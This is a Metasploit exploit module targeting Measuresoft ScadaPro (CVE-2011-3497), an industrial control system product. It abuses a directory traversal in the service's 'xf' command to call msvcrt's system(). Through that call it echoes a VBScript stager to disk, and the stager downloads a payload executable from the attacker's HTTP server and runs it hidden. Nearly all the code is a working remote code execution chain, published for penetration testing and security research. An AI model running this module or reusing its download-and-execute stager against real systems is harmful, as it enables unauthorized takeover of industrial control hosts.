##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
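class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Measuresoft ScadaPro Remote Command Execution',
        'Description' => %q{
          This module allows remote attackers to execute arbitrary commands on the
          affected system by abusing via Directory Traversal attack when using the
          'xf' command (execute function). An attacker can execute system() from
          msvcrt.dll to upload a backdoor and gain remote code execution. This
          vulnerability affects version 4.0.0 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Luigi Auriemma', # Initial discovery/poc
          'mr_me <steventhomasseeley[at]gmail.com>', # msf
          'TecR0c <tecr0c[at]tecninja.net>', # msf
        ],
        'References' => [
          [ 'CVE', '2011-3497'],
          [ 'OSVDB', '75490'],
          [ 'BID', '49613'],
          [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
          [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
          # Vendor statement disputing the original report; the module authors
          # found the report accurate.
          [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
        ],
        'DefaultOptions' => {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
        'Platform' => 'win',
        'Targets' => [
          # Command injection rather than memory corruption, so there are no
          # version-specific offsets: one target covers every affected build.
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2011-09-16',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The .vbs stager and the payload .exe are written to C:\Windows\Temp
          # (see build_vbs / exploit) and this module never removes them.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(11234),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ]
    )
  end

  # Build the single cmd.exe line that writes the VBScript stager to disk.
  #
  # A .vbs or .exe payload could not be written with the service's wF command
  # because the amount of data it will write to disk is limited, so a small
  # VBScript is appended to "#{@temp_folder}/#{stager_name}" with `echo ... >>`
  # instead. When run, the script fetches +url+ with Microsoft.XMLHTTP, saves
  # the response body as "#{@temp_folder}/#{@payload_name}.exe" through an
  # ADODB.Stream and launches that file via WScript.Shell. (The numeric
  # arguments Type=1, SaveToFile ...,2 and Run ...,0 are the usual binary /
  # overwrite / hidden-window values - confirm against the COM documentation.)
  #
  # Requires @temp_folder and @payload_name to have been set by #exploit.
  #
  # @param url [String] HTTP URL the stager downloads the payload .exe from
  # @param stager_name [String] file name of the .vbs stager under @temp_folder
  # @return [String] cmd.exe command line (no trailing newline)
  def build_vbs(url, stager_name)
    name_xmlhttp = rand_text_alpha(2)
    name_adodb = rand_text_alpha(2)

    tmp = "#{@temp_folder}/#{stager_name}"

    vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
    vbs << ": #{name_xmlhttp}.open \"GET\",\"#{url}\",False : #{name_xmlhttp}.send"
    vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
    vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
    vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
    vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
    vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"

    vbs
  end

  # HTTP handler for the stager's download request.
  #
  # Only URIs containing ".exe" are served: the payload is regenerated for the
  # requesting client and returned as application/octet-stream. Any other
  # request receives no response from this handler.
  #
  # @param cli [Rex::Proto::Http::ServerClient] connected client
  # @param request [Rex::Proto::Http::Request] the incoming request
  def on_request_uri(cli, request)
    return unless request.uri =~ /\.exe/

    print_status("Sending 2nd stage payload")
    p = regenerate_payload(cli)
    return if p.nil?

    data = generate_payload_exe({ :code => p.encoded })
    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
  end

  # Two-stage delivery over the ScadaPro service port (RPORT).
  #
  # Each "xf%<traversal>\msvcrt.dll,system,<cmd>" line makes the service call
  # msvcrt!system() with an attacker-chosen command line:
  #   1. createvbs echoes the VBScript stager into C:\Windows\Temp;
  #   2. download_execute starts that stager, which pulls the payload .exe from
  #      this module's HTTP server (see #on_request_uri) and runs it.
  #
  # The traversal depth ("..\" x5 up to windows\system32) and the temp
  # directory are hard-coded.
  #
  # NOTE(review): the HTTP service is only started by `super`
  # (HttpServer#exploit), i.e. after download_execute has already been sent,
  # so the target's download races service start-up; wscript start-up latency
  # normally covers it. Confirm whether start_service should be called before
  # the second xf command instead.
  def exploit
    # Binary data can't be written straight to the file system through the
    # service, so the payload is fetched by a .vbs stager and run from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder = "C:/Windows/Temp"

    # http://SRVHOST:SRVPORT/<URIPATH>/<payload_name>.exe, with the URIPATH
    # joined so exactly one '/' separates each component.
    payload_src = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}/"
    payload_src << datastore['URIPATH'].delete_prefix('/')
    payload_src << '/' unless payload_src.end_with?('/')
    payload_src << "#{@payload_name}.exe"

    stager_name = rand_text_alpha(6) + ".vbs"
    stager = build_vbs(payload_src, stager_name)

    path = "..\\..\\..\\..\\..\\windows\\system32"

    createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
    download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"

    print_status("Sending 1st stage payload...")

    connect
    sock.get_once # read and discard whatever the service sends first
    sock.put(createvbs)
    sock.get_once # drain the reply to the first command before sending the next
    sock.put(download_execute)
    handler
    disconnect

    # Starts the HTTP server that serves the .exe and blocks until it stops.
    super
  end
end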